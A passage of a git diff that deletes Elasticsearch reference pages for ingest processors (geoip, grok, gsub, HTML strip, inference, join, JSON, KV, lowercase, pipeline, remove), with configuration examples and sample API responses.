- - -Here is an example that uses the default city database and adds the geographical information to the `geoip` field based on the `ip` field: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ -  "description" : "Add geoip info", -  "processors" : [ -    { -      "geoip" : { -        "field" : "ip" -      } -    } -  ] -} -PUT my-index-00001/_doc/my_id?pipeline=geoip -{ -  "ip": "8.8.8.8" -} -GET my-index-00001/_doc/my_id --------------------------------------------------- - -Which returns: - -[source,console-result] --------------------------------------------------- -{ -  "found": true, -  "_index": "my-index-00001", -  "_type": "_doc", -  "_id": "my_id", -  "_version": 1, -  "_seq_no": 55, -  "_primary_term": 1, -  "_source": { -    "ip": "8.8.8.8", -    "geoip": { -      "continent_name": "North America", -      "country_name": "United States", -      "country_iso_code": "US", -      "location": { "lat": 37.751, "lon": -97.822 } -    } -  } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term":1/"_primary_term" : $body._primary_term/] - -Here is an example that uses the default country database and adds the -geographical information to the `geo` field based on the `ip` field. Note that -this database is included in the module. So this: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ -  "description" : "Add geoip info", -  "processors" : [ -    { -      "geoip" : { -        "field" : "ip", -        "target_field" : "geo", -        "database_file" : "GeoLite2-Country.mmdb" -      } -    } -  ] -} -PUT my-index-00001/_doc/my_id?pipeline=geoip -{ -  "ip": "8.8.8.8" -} -GET my-index-00001/_doc/my_id --------------------------------------------------- - -returns this: - -[source,console-result] --------------------------------------------------- -{ -  "found": true, -  "_index": "my-index-00001", -  "_type": "_doc", -  "_id": "my_id", -  "_version": 1, -  "_seq_no": 65, -  "_primary_term": 1, -  "_source": { -    "ip": "8.8.8.8", -    "geo": { -      "continent_name": "North America", -      "country_name": "United States", -      "country_iso_code": "US" -    } -  } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -Not all IP addresses find geo information in the database. When this -occurs, no `target_field` is inserted into the document.
- -Here is an example of what documents will be indexed as when information for "80.231.5.0" -cannot be found: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ - "description" : "Add geoip info", - "processors" : [ - { - "geoip" : { - "field" : "ip" - } - } - ] -} - -PUT my-index-00001/_doc/my_id?pipeline=geoip -{ - "ip": "80.231.5.0" -} - -GET my-index-00001/_doc/my_id --------------------------------------------------- - -Which returns: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-00001", - "_type" : "_doc", - "_id" : "my_id", - "_version" : 1, - "_seq_no" : 71, - "_primary_term": 1, - "found" : true, - "_source" : { - "ip" : "80.231.5.0" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -[[ingest-geoip-mappings-note]] -===== Recognizing Location as a Geopoint -Although this processor enriches your document with a `location` field containing -the estimated latitude and longitude of the IP address, this field will not be -indexed as a {ref}/geo-point.html[`geo_point`] type in Elasticsearch without explicitly defining it -as such in the mapping. - -You can use the following mapping for the example index above: - -[source,console] --------------------------------------------------- -PUT my_ip_locations -{ - "mappings": { - "properties": { - "geoip": { - "properties": { - "location": { "type": "geo_point" } - } - } - } - } -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ - "description" : "Add geoip info", - "processors" : [ - { - "geoip" : { - "field" : "ip" - } - } - ] -} - -PUT my_ip_locations/_doc/1?refresh=true&pipeline=geoip -{ - "ip": "8.8.8.8" -} - -GET /my_ip_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "1m", - "geoip.location": { - "lon": -97.822, - "lat": 37.751 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took" : 3, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "my_ip_locations", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "geoip" : { - "continent_name" : "North America", - "country_name" : "United States", - "country_iso_code" : "US", - "location" : { - "lon" : -97.822, - "lat" : 37.751 - } - }, - "ip" : "8.8.8.8" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 3/"took" : $body.took/] -//// - -[[ingest-geoip-settings]] -===== Node Settings - -The `geoip` processor supports the following setting: - -`ingest.geoip.cache_size`:: - - The maximum number of results that should be cached. Defaults to `1000`. - -Note that these settings are node settings and apply to all `geoip` processors, i.e. there is one cache for all defined `geoip` processors. 
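For example, to change the cache size, the setting can be added to the `config/elasticsearch.yml` file of each node (the value below is purely illustrative):

[source,yaml]
--------------------------------------------------
ingest.geoip.cache_size: 2000
--------------------------------------------------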
diff --git a/docs/reference/ingest/processors/grok.asciidoc b/docs/reference/ingest/processors/grok.asciidoc deleted file mode 100644 index 1c7e6d1b0aa..00000000000 --- a/docs/reference/ingest/processors/grok.asciidoc +++ /dev/null @@ -1,376 +0,0 @@ -[[grok-processor]] -=== Grok processor -++++ -Grok -++++ - -Extracts structured fields out of a single text field within a document. You choose which field to -extract matched fields from, as well as the grok pattern you expect will match. A grok pattern is like a regular -expression that supports aliased expressions that can be reused. - -This tool is perfect for syslog logs, apache and other webserver logs, mysql logs, and in general, any log format -that is generally written for humans and not computer consumption. -This processor comes packaged with many -https://github.com/elastic/elasticsearch/blob/{branch}/libs/grok/src/main/resources/patterns[reusable patterns]. - -If you need help building patterns to match your logs, you will find the {kibana-ref}/xpack-grokdebugger.html[Grok Debugger] tool quite useful! The Grok Debugger is an {xpack} feature under the Basic License and is therefore *free to use*. The https://grokconstructor.appspot.com[Grok Constructor] is also a useful tool. - -[[grok-basics]] -==== Grok Basics - -Grok sits on top of regular expressions, so any regular expressions are valid in grok as well. -The regular expression library is Oniguruma, and you can see the full supported regexp syntax -https://github.com/kkos/oniguruma/blob/master/doc/RE[on the Oniguruma site]. - -Grok works by leveraging this regular expression language to allow naming existing patterns and combining them into more -complex patterns that match your fields. - -The syntax for reusing a grok pattern comes in three forms: `%{SYNTAX:SEMANTIC}`, `%{SYNTAX}`, `%{SYNTAX:SEMANTIC:TYPE}`. - -The `SYNTAX` is the name of the pattern that will match your text. For example, `3.44` will be matched by the `NUMBER` -pattern and `55.3.244.1` will be matched by the `IP` pattern. The syntax is how you match. `NUMBER` and `IP` are both -patterns that are provided within the default patterns set. - -The `SEMANTIC` is the identifier you give to the piece of text being matched. For example, `3.44` could be the -duration of an event, so you could call it simply `duration`. Further, a string `55.3.244.1` might identify -the `client` making a request. - -The `TYPE` is the type you wish to cast your named field. `int`, `long`, `double`, `float` and `boolean` are supported types for coercion. - -For example, you might want to match the following text: - -[source,txt] --------------------------------------------------- -3.44 55.3.244.1 --------------------------------------------------- - -You may know that the message in the example is a number followed by an IP address. You can match this text by using the following -Grok expression. - -[source,txt] --------------------------------------------------- -%{NUMBER:duration} %{IP:client} --------------------------------------------------- - -[[using-grok]] -==== Using the Grok Processor in a Pipeline - -[[grok-options]] -.Grok Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to use for grok expression parsing -| `patterns` | yes | - | An ordered list of grok expression to match and extract named captures with. Returns on the first expression in the list that matches. 
-| `pattern_definitions` | no | - | A map of pattern-name and pattern tuples defining custom patterns to be used by the current processor. Patterns matching existing names will override the pre-existing definition. -| `trace_match` | no | false | when true, `_ingest._grok_match_index` will be inserted into your matched document's metadata with the index into the pattern found in `patterns` that matched. -| `ignore_missing` | no | false | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -Here is an example of using the provided patterns to extract out and name structured fields from a string field in -a document. - -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline": { - "description" : "...", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["%{IP:client} %{WORD:method} %{URIPATHPARAM:request} %{NUMBER:bytes:int} %{NUMBER:duration:double}"] - } - } - ] - }, - "docs":[ - { - "_source": { - "message": "55.3.244.1 GET /index.html 15824 0.043" - } - } - ] -} --------------------------------------------------- - -This pipeline will insert these named captures as new fields within the document, like so: - -[source,console-result] --------------------------------------------------- -{ - "docs": [ - { - "doc": { - "_index": "_index", - "_type": "_doc", - "_id": "_id", - "_source" : { - "duration" : 0.043, - "request" : "/index.html", - "method" : "GET", - "bytes" : 15824, - "client" : "55.3.244.1", - "message" : "55.3.244.1 GET /index.html 15824 0.043" - }, - "_ingest": { - "timestamp": "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -[[custom-patterns]] -==== Custom Patterns - -The Grok processor comes pre-packaged with a base set of patterns. These patterns may not always have -what you are looking for. Patterns have a very basic format. Each entry has a name and the pattern itself. - -You can add your own patterns to a processor definition under the `pattern_definitions` option. -Here is an example of a pipeline specifying custom pattern definitions: - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["my %{FAVORITE_DOG:dog} is colored %{RGB:color}"], - "pattern_definitions" : { - "FAVORITE_DOG" : "beagle", - "RGB" : "RED|GREEN|BLUE" - } - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -[[trace-match]] -==== Providing Multiple Match Patterns - -Sometimes one pattern is not enough to capture the potential structure of a field. Let's assume we -want to match all messages that contain your favorite pet breeds of either cats or dogs. One way to accomplish -this is to provide two distinct patterns that can be matched, instead of one really complicated expression capturing -the same `or` behavior. 
- -Here is an example of such a configuration executed against the simulate API: - -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline": { - "description" : "parse multiple patterns", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["%{FAVORITE_DOG:pet}", "%{FAVORITE_CAT:pet}"], - "pattern_definitions" : { - "FAVORITE_DOG" : "beagle", - "FAVORITE_CAT" : "burmese" - } - } - } - ] -}, -"docs":[ - { - "_source": { - "message": "I love burmese cats!" - } - } - ] -} --------------------------------------------------- - -response: - -[source,console-result] --------------------------------------------------- -{ - "docs": [ - { - "doc": { - "_type": "_doc", - "_index": "_index", - "_id": "_id", - "_source": { - "message": "I love burmese cats!", - "pet": "burmese" - }, - "_ingest": { - "timestamp": "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -Both patterns will set the field `pet` with the appropriate match, but what if we want to trace which of our -patterns matched and populated our fields? We can do this with the `trace_match` parameter. Here is the output of -that same pipeline, but with `"trace_match": true` configured: - -//// -Hidden setup for example: -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline": { - "description" : "parse multiple patterns", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["%{FAVORITE_DOG:pet}", "%{FAVORITE_CAT:pet}"], - "trace_match": true, - "pattern_definitions" : { - "FAVORITE_DOG" : "beagle", - "FAVORITE_CAT" : "burmese" - } - } - } - ] -}, -"docs":[ - { - "_source": { - "message": "I love burmese cats!" - } - } - ] -} --------------------------------------------------- -//// - -[source,console-result] --------------------------------------------------- -{ - "docs": [ - { - "doc": { - "_type": "_doc", - "_index": "_index", - "_id": "_id", - "_source": { - "message": "I love burmese cats!", - "pet": "burmese" - }, - "_ingest": { - "_grok_match_index": "1", - "timestamp": "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -In the above response, you can see that the index of the pattern that matched was `"1"`. This is to say that it was the -second (index starts at zero) pattern in `patterns` to match. - -This trace metadata enables debugging which of the patterns matched. This information is stored in the ingest -metadata and will not be indexed. - -[[grok-processor-rest-get]] -==== Retrieving patterns from REST endpoint - -The Grok Processor comes packaged with its own REST endpoint for retrieving which patterns the processor is packaged with. - -[source,console] --------------------------------------------------- -GET _ingest/processor/grok --------------------------------------------------- - -The above request will return a response body containing a key-value representation of the built-in patterns dictionary. - -[source,js] --------------------------------------------------- -{ - "patterns" : { - "BACULA_CAPACITY" : "%{INT}{1,3}(,%{INT}{3})*", - "PATH" : "(?:%{UNIXPATH}|%{WINPATH})", - ... 
-} --------------------------------------------------- -// NOTCONSOLE - -By default, the API returns patterns in the order they are read from disk. This -sort order preserves groupings of related patterns. For example, all patterns -related to parsing Linux syslog lines stay grouped together. - -You can use the optional boolean `s` query parameter to sort returned patterns -by key name instead. - -[source,console] --------------------------------------------------- -GET _ingest/processor/grok?s --------------------------------------------------- - -The API returns the following response. - -[source,js] --------------------------------------------------- -{ - "patterns" : { - "BACULA_CAPACITY" : "%{INT}{1,3}(,%{INT}{3})*", - "BACULA_DEVICE" : "%{USER}", - "BACULA_DEVICEPATH" : "%{UNIXPATH}", - ... -} --------------------------------------------------- -// NOTCONSOLE - - -This can be useful to reference as the built-in patterns change across versions. - -[[grok-watchdog]] -==== Grok watchdog - -Grok expressions that take too long to execute are interrupted and -the grok processor then fails with an exception. The grok -processor has a watchdog thread that determines when evaluation of -a grok expression takes too long and is controlled by the following -settings: - -[[grok-watchdog-options]] -.Grok watchdog settings -[options="header"] -|====== -| Name | Default | Description -| `ingest.grok.watchdog.interval` | 1s | How often to check whether there are grok evaluations that take longer than the maximum allowed execution time. -| `ingest.grok.watchdog.max_execution_time` | 1s | The maximum allowed execution of a grok expression evaluation. -|====== - -[[grok-debugging]] -==== Grok debugging - -It is advised to use the {kibana-ref}/xpack-grokdebugger.html[Grok Debugger] to debug grok patterns. From there you can test one or more -patterns in the UI against sample data. Under the covers it uses the same engine as ingest node processor. - -Additionally, it is recommended to enable debug logging for Grok so that any additional messages may also be seen in the Elasticsearch -server log. - -[source,js] --------------------------------------------------- -PUT _cluster/settings -{ - "transient": { - "logger.org.elasticsearch.ingest.common.GrokProcessor": "debug" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/gsub.asciidoc b/docs/reference/ingest/processors/gsub.asciidoc deleted file mode 100644 index bd84336b8f5..00000000000 --- a/docs/reference/ingest/processors/gsub.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[gsub-processor]] -=== Gsub processor -++++ -Gsub -++++ - -Converts a string field by applying a regular expression and a replacement. -If the field is an array of string, all members of the array will be converted. If any non-string values are encountered, the processor will throw an exception. 
- -[[gsub-options]] -.Gsub Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to apply the replacement to -| `pattern` | yes | - | The pattern to be replaced -| `replacement` | yes | - | The string to replace the matching patterns with -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "gsub": { - "field": "field1", - "pattern": "\\.", - "replacement": "-" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/html_strip.asciidoc b/docs/reference/ingest/processors/html_strip.asciidoc deleted file mode 100644 index 6e95015d253..00000000000 --- a/docs/reference/ingest/processors/html_strip.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[htmlstrip-processor]] -=== HTML strip processor -++++ -HTML strip -++++ - -Removes HTML tags from the field. If the field is an array of strings, HTML tags will be removed from all members of the array. - -NOTE: Each HTML tag is replaced with a `\n` character. - -[[htmlstrip-options]] -.HTML Strip Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The string-valued field to remove HTML tags from -| `target_field` | no | `field` | The field to assign the value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "html_strip": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/inference.asciidoc b/docs/reference/ingest/processors/inference.asciidoc deleted file mode 100644 index 5c7d6a3cd52..00000000000 --- a/docs/reference/ingest/processors/inference.asciidoc +++ /dev/null @@ -1,194 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[inference-processor]] -=== {infer-cap} processor -++++ -{infer-cap} -++++ - -experimental::[] - -Uses a pre-trained {dfanalytics} model to infer against the data that is being -ingested in the pipeline. - - -[[inference-options]] -.{infer-cap} Options -[options="header"] -|====== -| Name | Required | Default | Description -| `model_id` | yes | - | (String) The ID of the model to load and infer against. -| `target_field` | no | `ml.inference.` | (String) Field added to incoming documents to contain results objects. -| `field_map` | no | If defined the model's default field map | (Object) Maps the document field names to the known field names of the model. This mapping takes precedence over any default mappings provided in the model configuration. -| `inference_config` | no | The default settings defined in the model | (Object) Contains the inference type and its options. There are two types: <> and <>. 
-include::common-options.asciidoc[]
-|======
-
-
-[source,js]
---------------------------------------------------
-{
-  "inference": {
-    "model_id": "flight_delay_regression-1571767128603",
-    "target_field": "FlightDelayMin_prediction_infer",
-    "field_map": {
-      "your_field": "my_field"
-    },
-    "inference_config": { "regression": {} }
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
-
-
-[discrete]
-[[inference-processor-regression-opt]]
-==== {regression-cap} configuration options
-
-Regression configuration for inference.
-
-`results_field`::
-(Optional, string)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field-processor]
-
-`num_top_feature_importance_values`::
-(Optional, integer)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values]
-
-
-[discrete]
-[[inference-processor-classification-opt]]
-==== {classification-cap} configuration options
-
-Classification configuration for inference.
-
-`num_top_classes`::
-(Optional, integer)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes]
-
-`num_top_feature_importance_values`::
-(Optional, integer)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values]
-
-`results_field`::
-(Optional, string)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field-processor]
-
-`top_classes_results_field`::
-(Optional, string)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-top-classes-results-field]
-
-`prediction_field_type`::
-(Optional, string)
-include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type]
-
-[discrete]
-[[inference-processor-config-example]]
-==== `inference_config` examples
-
-[source,js]
---------------------------------------------------
-"inference":{
-  "model_id": "my_model_id",
-  "inference_config": {
-    "regression": {
-      "results_field": "my_regression"
-    }
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
-
-This configuration specifies a `regression` inference and the results are
-written to the `my_regression` field contained in the `target_field` results
-object.
-
-
-[source,js]
---------------------------------------------------
-"inference":{
-  "model_id": "my_model_id",
-  "inference_config": {
-    "classification": {
-      "num_top_classes": 2,
-      "results_field": "prediction",
-      "top_classes_results_field": "probabilities"
-    }
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
-
-This configuration specifies a `classification` inference. The number of
-categories for which the predicted probabilities are reported is 2
-(`num_top_classes`). The result is written to the `prediction` field and the top
-classes to the `probabilities` field. Both fields are contained in the
-`target_field` results object.
-
-Refer to the
-{ml-docs}/ml-lang-ident.html#ml-lang-ident-example[language identification]
-trained model documentation for a full example.
-
-
-[discrete]
-[[inference-processor-feature-importance]]
-==== {feat-imp-cap} object mapping
-
-To get the full benefit of aggregating and searching for
-{ml-docs}/ml-feature-importance.html[{feat-imp}], update your index mapping of
-the {feat-imp} result field as you can see below:
-
-[source,js]
---------------------------------------------------
-"ml.inference.feature_importance": {
-  "type": "nested",
-  "dynamic": true,
-  "properties": {
-    "feature_name": {
-      "type": "keyword"
-    },
-    "importance": {
-      "type": "double"
-    }
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
-
-The mapping field name for {feat-imp} (in the example above, it is
-`ml.inference.feature_importance`) is compounded as follows:
-
-`<target_field>`.`<tag>`.`feature_importance`
-
-* `<target_field>`: defaults to `ml.inference`.
-* `<tag>`: if a `tag` is not provided in the processor definition, then it is
-not part of the field path.
-
-For example, if you provide a tag `foo` in the definition as you can see below:
-
-[source,js]
---------------------------------------------------
-{
-  "tag": "foo",
-  ...
-}
---------------------------------------------------
-// NOTCONSOLE
-
-
-Then, the {feat-imp} value is written to the
-`ml.inference.foo.feature_importance` field.
-
-You can also specify the target field as follows:
-
-[source,js]
---------------------------------------------------
-{
-  "tag": "foo",
-  "target_field": "my_field"
-}
---------------------------------------------------
-// NOTCONSOLE
-
-In this case, {feat-imp} is exposed in the
-`my_field.foo.feature_importance` field.
diff --git a/docs/reference/ingest/processors/join.asciidoc b/docs/reference/ingest/processors/join.asciidoc
deleted file mode 100644
index 6cb363940e2..00000000000
--- a/docs/reference/ingest/processors/join.asciidoc
+++ /dev/null
@@ -1,30 +0,0 @@
-[[join-processor]]
-=== Join processor
-++++
-Join
-++++
-
-Joins each element of an array into a single string using a separator character between each element.
-Throws an error when the field is not an array.
-
-[[join-options]]
-.Join Options
-[options="header"]
-|======
-| Name           | Required  | Default  | Description
-| `field`        | yes       | -        | Field containing array values to join
-| `separator`    | yes       | -        | The separator character
-| `target_field` | no        | `field`  | The field to assign the joined value to, by default `field` is updated in-place
-include::common-options.asciidoc[]
-|======
-
-[source,js]
---------------------------------------------------
-{
-  "join": {
-    "field": "joined_array_field",
-    "separator": "-"
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
diff --git a/docs/reference/ingest/processors/json.asciidoc b/docs/reference/ingest/processors/json.asciidoc
deleted file mode 100644
index 2ccefbb0ef1..00000000000
--- a/docs/reference/ingest/processors/json.asciidoc
+++ /dev/null
@@ -1,92 +0,0 @@
-[[json-processor]]
-=== JSON processor
-++++
-JSON
-++++
-
-Converts a JSON string into a structured JSON object.
-
-[[json-options]]
-.Json Options
-[options="header"]
-|======
-| Name           | Required  | Default  | Description
-| `field`        | yes       | -        | The field to be parsed.
-| `target_field` | no        | `field`  | The field that the converted structured object will be written into. Any existing content in this field will be overwritten.
-| `add_to_root`  | no        | false    | Flag that forces the serialized json to be injected into the top level of the document. `target_field` must not be set when this option is chosen.
-include::common-options.asciidoc[] -|====== - -All JSON-supported types will be parsed (null, boolean, number, array, object, string). - -Suppose you provide this configuration of the `json` processor: - -[source,js] --------------------------------------------------- -{ - "json" : { - "field" : "string_source", - "target_field" : "json_target" - } -} --------------------------------------------------- -// NOTCONSOLE - -If the following document is processed: - -[source,js] --------------------------------------------------- -{ - "string_source": "{\"foo\": 2000}" -} --------------------------------------------------- -// NOTCONSOLE - -after the `json` processor operates on it, it will look like: - -[source,js] --------------------------------------------------- -{ - "string_source": "{\"foo\": 2000}", - "json_target": { - "foo": 2000 - } -} --------------------------------------------------- -// NOTCONSOLE - -If the following configuration is provided, omitting the optional `target_field` setting: -[source,js] --------------------------------------------------- -{ - "json" : { - "field" : "source_and_target" - } -} --------------------------------------------------- -// NOTCONSOLE - -then after the `json` processor operates on this document: - -[source,js] --------------------------------------------------- -{ - "source_and_target": "{\"foo\": 2000}" -} --------------------------------------------------- -// NOTCONSOLE - -it will look like: - -[source,js] --------------------------------------------------- -{ - "source_and_target": { - "foo": 2000 - } -} --------------------------------------------------- -// NOTCONSOLE - -This illustrates that, unless it is explicitly named in the processor configuration, the `target_field` -is the same field provided in the required `field` configuration. diff --git a/docs/reference/ingest/processors/kv.asciidoc b/docs/reference/ingest/processors/kv.asciidoc deleted file mode 100644 index f8e251925af..00000000000 --- a/docs/reference/ingest/processors/kv.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[kv-processor]] -=== KV processor -++++ -KV -++++ - -This processor helps automatically parse messages (or specific event fields) which are of the `foo=bar` variety. - -For example, if you have a log message which contains `ip=1.2.3.4 error=REFUSED`, you can parse those fields automatically by configuring: - -[source,js] --------------------------------------------------- -{ - "kv": { - "field": "message", - "field_split": " ", - "value_split": "=" - } -} --------------------------------------------------- -// NOTCONSOLE - -TIP: Using the KV Processor can result in field names that you cannot control. Consider using the <> data type instead, which maps an entire object as a single field and allows for simple searches over its contents. - -[[kv-options]] -.KV Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be parsed -| `field_split` | yes | - | Regex pattern to use for splitting key-value pairs -| `value_split` | yes | - | Regex pattern to use for splitting the key from the value within a key-value pair -| `target_field` | no | `null` | The field to insert the extracted keys into. Defaults to the root of the document -| `include_keys` | no | `null` | List of keys to filter and insert into document. 
Defaults to including all keys -| `exclude_keys` | no | `null` | List of keys to exclude from document -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -| `prefix` | no | `null` | Prefix to be added to extracted keys -| `trim_key` | no | `null` | String of characters to trim from extracted keys -| `trim_value` | no | `null` | String of characters to trim from extracted values -| `strip_brackets` | no | `false` | If `true` strip brackets `()`, `<>`, `[]` as well as quotes `'` and `"` from extracted values -include::common-options.asciidoc[] -|====== diff --git a/docs/reference/ingest/processors/lowercase.asciidoc b/docs/reference/ingest/processors/lowercase.asciidoc deleted file mode 100644 index 2e95b1eca6c..00000000000 --- a/docs/reference/ingest/processors/lowercase.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[lowercase-processor]] -=== Lowercase processor -++++ -Lowercase -++++ - -Converts a string to its lowercase equivalent. If the field is an array of strings, all members of the array will be converted. - -[[lowercase-options]] -.Lowercase Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to make lowercase -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "lowercase": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/pipeline.asciidoc b/docs/reference/ingest/processors/pipeline.asciidoc deleted file mode 100644 index a663b704292..00000000000 --- a/docs/reference/ingest/processors/pipeline.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[pipeline-processor]] -=== Pipeline processor -++++ -Pipeline -++++ - -Executes another pipeline. - -[[pipeline-options]] -.Pipeline Options -[options="header"] -|====== -| Name | Required | Default | Description -| `name` | yes | - | The name of the pipeline to execute. Supports <>. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "pipeline": { - "name": "inner-pipeline" - } -} --------------------------------------------------- -// NOTCONSOLE - -The name of the current pipeline can be accessed from the `_ingest.pipeline` ingest metadata key. 
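-
-For instance, assuming the `_ingest.pipeline` key can be referenced from a template in the same
-way as `_ingest.timestamp`, a `set` processor could record which pipeline handled the document
-in a hypothetical `invoked_by` field:
-
-[source,js]
---------------------------------------------------
-{
-  "set": {
-    "field": "invoked_by",
-    "value": "{{_ingest.pipeline}}"
-  }
-}
---------------------------------------------------
-// NOTCONSOLE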
- -An example of using this processor for nesting pipelines would be: - -Define an inner pipeline: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/pipelineA -{ - "description" : "inner pipeline", - "processors" : [ - { - "set" : { - "field": "inner_pipeline_set", - "value": "inner" - } - } - ] -} --------------------------------------------------- - -Define another pipeline that uses the previously defined inner pipeline: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/pipelineB -{ - "description" : "outer pipeline", - "processors" : [ - { - "pipeline" : { - "name": "pipelineA" - } - }, - { - "set" : { - "field": "outer_pipeline_set", - "value": "outer" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -Now indexing a document while applying the outer pipeline will see the inner pipeline executed -from the outer pipeline: - -[source,console] --------------------------------------------------- -PUT /my-index/_doc/1?pipeline=pipelineB -{ - "field": "value" -} --------------------------------------------------- -// TEST[continued] - -Response from the index request: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index", - "_type": "_doc", - "_id": "1", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 66, - "_primary_term": 1, -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -Indexed document: - -[source,js] --------------------------------------------------- -{ - "field": "value", - "inner_pipeline_set": "inner", - "outer_pipeline_set": "outer" -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/remove.asciidoc b/docs/reference/ingest/processors/remove.asciidoc deleted file mode 100644 index 57e785c2de7..00000000000 --- a/docs/reference/ingest/processors/remove.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[[remove-processor]] -=== Remove processor -++++ -Remove -++++ - -Removes existing fields. If one field doesn't exist, an exception will be thrown. - -[[remove-options]] -.Remove Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | Fields to be removed. Supports <>. -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -Here is an example to remove a single field: - -[source,js] --------------------------------------------------- -{ - "remove": { - "field": "user_agent" - } -} --------------------------------------------------- -// NOTCONSOLE - -To remove multiple fields, you can use the following query: - -[source,js] --------------------------------------------------- -{ - "remove": { - "field": ["user_agent", "url"] - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/rename.asciidoc 